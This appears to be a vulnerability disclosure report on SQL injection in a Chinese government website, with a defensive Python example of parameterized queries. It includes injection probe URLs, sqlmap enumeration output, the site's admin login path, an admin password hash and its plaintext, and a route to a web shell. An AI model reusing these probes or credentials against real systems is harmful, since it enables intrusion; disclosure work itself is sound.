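2013-10-29: Details reported to the vendor; awaiting vendor handling
2013-11-02: Vendor confirmed; details disclosed to the vendor only
2013-11-12: Details disclosed to core white hats and experts in related fields
2013-11-22: Details disclosed to regular white hats
2013-12-02: Details disclosed to intern white hats
2013-12-13: Details disclosed to the public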
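SQL misconfiguration.
Entering a single quote, as in http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922' , returns the warning: "Attacking a government website is illegal. Your IP has been recorded, and the system automatically submits the details of the attack to the cyber police. We reserve the right to pursue liability!"
Entering and 1=2 returns the error 错误 '80020009'/web/content_hd.do,行 71 (error '80020009' at line 71 of /web/content_hd.do):
http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922%20and%201=2
And of course http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922%20and%201=1 returns the normal page.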
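The behaviour described above (the quote is blocked, yet and 1=1 / and 1=2 still change the result) is what a quote blacklist in front of a concatenated numeric parameter looks like. The following is an added example, not code from the report or from the affected site: it uses Python's sqlite3 as a stand-in for the ASP/MSSQL stack, and the table, function names and sample row are constructed. The false condition shows up here as zero rows, where the site raised an error.

```python
import sqlite3


class Blocked(Exception):
    """Raised when a request is refused before it reaches the database."""


def make_db():
    # Constructed sample table standing in for the site's content table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO content VALUES (21922, 'constructed sample article')")
    return db


def fetch_blacklist(db, raw_id):
    # 'Before': reject input containing a quote, then concatenate into SQL.
    # A numeric context needs no quote, so the filter does not help.
    if "'" in raw_id:
        raise Blocked("quote character filtered")
    return db.execute("SELECT title FROM content WHERE id = " + raw_id).fetchall()


def fetch_hardened(db, raw_id):
    # 'After': accept only a short run of ASCII digits and bind it as a
    # parameter, so the value can never become part of the SQL text.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise Blocked("id must be a decimal integer")
    return db.execute("SELECT title FROM content WHERE id = ?", (int(raw_id),)).fetchall()


def outcome(fn, db, raw_id):
    try:
        return "rows=%d" % len(fn(db, raw_id))
    except Blocked:
        return "blocked"


def compare():
    # The same four inputs the report walks through, decoded from the URLs.
    db = make_db()
    inputs = ["21922", "21922'", "21922 and 1=1", "21922 and 1=2"]
    return {i: (outcome(fetch_blacklist, db, i), outcome(fetch_hardened, db, i))
            for i in inputs}


if __name__ == "__main__":
    for raw, (before, after) in compare().items():
        print(f"{raw!r:18} blacklist={before:8} hardened={after}")
```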
SQL injection
Target: http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922
Host IP: 218.60.144.144
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MSSQL 2005 with error
Resp. Time(avg): 406 ms
Current User: jishengwei
Sql Version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Current DB: jsw2010
System User: jishengwei
Host Name: JSW
Server Name: JSW jsw2010
Data Bases: master tempdb model msdb pubs Northwind jsw2010 count

Table enumeration with sqlmap

available databases [8]:
[*] count
[*] jsw2010
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb

Database: jsw2010
[110 tables]

Database: jsw2010
Table: dbo.PE_Admin
[31 columns]

Table enumeration with pangolin
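The admin back end was found by guessing: http://www.lnrkjsw.gov.cn/admin/admin_login.asp
Weak password. Username: admin; password: f64793875b2204cf (decoding it gives the plaintext password admin888888)
The back end can be entered, and the allowed upload types can be modified, which allows getting a shell.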
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2013-11-02 19:57
None yet